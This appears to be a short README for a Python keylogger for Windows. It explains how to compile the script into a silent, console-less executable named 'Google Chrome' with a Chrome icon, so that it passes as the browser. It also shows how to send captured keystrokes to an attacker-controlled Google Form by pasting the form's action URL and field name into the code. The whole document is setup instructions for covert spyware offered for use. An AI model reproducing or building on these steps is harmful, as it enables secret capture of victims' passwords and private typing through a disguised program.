A.K Python KeyLogger is a python based keylogger and linked with Google Chrome for windows based operating system. Use pyinstaller to convert .py file with dependencies to single .exe file:-
pyinstaller --onefile --noconsole --ico=chrome.ico "Google Chrome.py"
Note you can use this icon.
Requirements:
Create a Google Form like this:
And then open source code of your form like this:
And from there retrieve from form action value='xxxx' and text name value='xxxx' as shown in image. And then paste it under remote() method's url and klog variables.